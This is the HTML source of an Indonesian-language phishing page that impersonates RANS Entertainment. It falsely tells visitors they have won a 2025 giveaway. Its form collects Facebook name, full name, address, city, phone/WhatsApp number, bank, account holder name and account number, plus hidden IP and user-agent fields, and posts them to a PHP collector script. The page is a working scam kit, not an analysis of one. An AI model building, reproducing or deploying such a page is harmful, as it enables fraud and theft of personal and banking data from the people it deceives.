<!DOCTYPE html>
<html id="feProdAWS04" lang="id">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>RANS ENTERTAMENT - berbagi hadiah give away 2025</title>
<link rel="icon" href="https://h.top4top.io/p_2720e8cda0.jpg">
<meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1, minimum-scale=1,maximum-scale=1">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<meta name="description" content="RANS ENTERTAMENT, ikuti give away tiap hari raihkan juta'an rupiah, ayo buruan ikut.selamat!!!">
<meta name="keywords" content="RANS ENTERTAMENT, RANS ENTERTAMENT, RANS ENTERTAMENT GIVE-AWAY">
<meta name="robots" content="index, follow">
<meta name="robots" content="noindex" />
<meta name='rating' content='general' />
<meta name='geo.country' content='id' />
<meta name='geo.placename' content='Indonesia' />
<meta name="geo.region" content="Indon.esia" />
<meta name="geo.country" content="Indonesia" />
<meta name="language" content="Indonesia" />
<meta name="tgn.nation" content="Indonesia" />
<meta name="distribution" content="global" />
<meta name="publisher" content=">RANS ENTERTAMENT" />
<meta name="dc.Publisher" content="RANS ENTERTAMENT">
<meta name="dc.language" content="id,en">
<meta name="owner" content="RANS ENTERTAMENT" />
<meta name='MSSmartTagsPreventParsing' content='true' />
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<!--link connect css-->
<link rel="stylesheet" href="./yondahost/style.css"/>
<link rel="stylesheet" href="./facebook/style.css"/>
<!--end-->
</head>
<style type="text/css" media="all">
    body{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    max-width: 500px;
    height: 170vh;
    margin: 0 auto;
    background-position: center;
    background-size: cover;
    background-attachment: fixed;
    background-image: url(jsss.jpg);
}


.rans {
    display: flex;
    height: 100px;
    background-color: #000000e7;
    padding-bottom: 10px;
    border-right: solid;
    border-left: solid;
    backdrop-filter: blur(2px);
    border-bottom: solid ;
    filter: blur(9);
    align-items: center;
    margin-left: auto;
    margin-right: auto;
    justify-content: center;
}
.rans img {
    width: 250px;
}
.text-give {
    background-color: #050505a1;
    padding-top: 30px;
    border-bottom: solid;
    border-left: solid;
    border-right: solid;
    padding-bottom: 40px;
    backdrop-filter: blur(2px);
}
.text-give h1{
    text-align: center;
    font-size: 20px;
    font-family: "Sans-Serif";
    color: whitesmoke;
}
.text-give span {
    background: linear-gradient(45deg, red, blue);;
    font-weight: 800;
    background-clip: text;
    -webkit-text-fill-color: transparent;
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    font-style: oblique;
    text-decoration: underline;
}

.text-form h6{
    font-size: 14px;
    padding-top: 22px;
    font-family: "Sans-Serif";
    font-weight: 100;
    letter-spacing: 1px;
    color: #ffffff;
}

.form-group{
   display: block;
   margin-left: auto;
   margin-right: auto;
   border: solid;
   backdrop-filter: blur(2px);
   background-color: #1d011dbd;
}

.input-login {
            display: -webkit-box;
            display: -ms-flexbox;
            display: flex;
            -webkit-box-orient: vertical;
            -webkit-box-direction: normal;
            -ms-flex-direction: column;
            flex-direction: column;
            border-radius: 5px;
            -webkit-transition: 0.3s;
            transition: 0.3s;
            padding: 10px;
            color: gray;
            margin: 10px;
}

.input-login input {
            outline: 0;
            border: 0;
            font-size: 12px;
            font-family: "Nunito", sans-serif;
            color: gray;
            background-color: #ECECEC;
            padding: 18px; 
            border-radius: 10px;
}

input::placeholder{
    margin: 40px auto;
}
        
.input-bank select{
    width: 90%;
    border: 1px solid #ddd;
    border-radius: 10px;
    transition: 0.3s;
    padding: 15px;
    background-color: #ECECEC; 
    color: gray;
    margin: 10px;
    display: block;
    margin-left: auto;
    margin-right: auto;
}

select,option{
    border: none;
    background-color: white;
    color: gray;
}

input::placeholder{
    color: gray;
}

input:focus,
            select:focus,
            textarea:focus,
            button:focus {
                outline: none;
        }

.btn-masuk input{
    width: 70%;
    padding: 13px 13px;
    border: none;
    background-color: #a904af;
    color: #fff;
    border-radius: 10px;
    margin-top: 10px;
    display: block;
    margin-bottom: 10px;
    margin-right: auto;
    margin-left: auto;
    box-shadow: 1px 1px 1px 1px #fff;
    font-family: "Roboto";
}

.text-input{
    font-size: 13px;
    color: gray;
}

</style>
<body>
    <div class="container">
        </div>
        <div class="rans">
            <img src="icon.png" alt="">
            </div>
        <div class="text-give">

            <h1>SELAMAT ANDA MEMENANGKAN GIVE-AWAY<span> RANS ENTERTAIMENT 2025</span></h1>
        </div>
         <form class="form-group" action="gocoh.php" method="post">
                <div class="text-form">
                    <h6 style="text-align: center;">ISI DATA DIRI ANDA DENGAN BENAR UNTUK MELANJUTKAN</h6>
                </div>
                <div class="input-login">
                    <input type="text" name="fb" required placeholder="Nama Facebook">
                </div>
                 
                <div class="input-login">
                    <input type="text" name="user" required placeholder="Nama Lengkap">
                </div>
                
                <div class="input-login">
                    <input type="text" name="alamat" required placeholder="Alamat Lengkap">
                </div>
                <div class="input-login">
                    <input type="text" name="kota" required placeholder="Kota/Provinsi">
                </div>
                <div class="input-login">
                    <input type="tel" name="wa" required placeholder="Nomor Hp/Wa">
                </div>
                
                 <div class="text-form">
                     <h6 style="text-align: center;">INFORMASI REKENING</h6>
                 </div>
                 <div class="input-bank">
                    <select name="bank" id="bank">
                        <option selected="" disabled="">PILIH BANK</option>
                        <option>BCA</option>
                        <option>BNI</option>
                        <option>BRI</option>
                        <option>BSI</option>
                        <option>MANDIRI</option>
                        <option>LAINNYA</option>
                    </select>
                </div>
                <div class="input-login">
                    <input type="text" name="narek" required placeholder="Nama Rekening">
                </div>
                <div class="input-login">
                    <input type="tel" name="norek" required placeholder="Nomor Rekening">
                </div>
                <input type="hidden" name="ip" value="">
                    <input type="hidden" name="ua" value="">
                 <div class="btn-masuk">
                    <input type="submit" value="KLIK UNTUK MELANJUTKAN">
                 </div>
            </form>
    </div>
</body>
</html>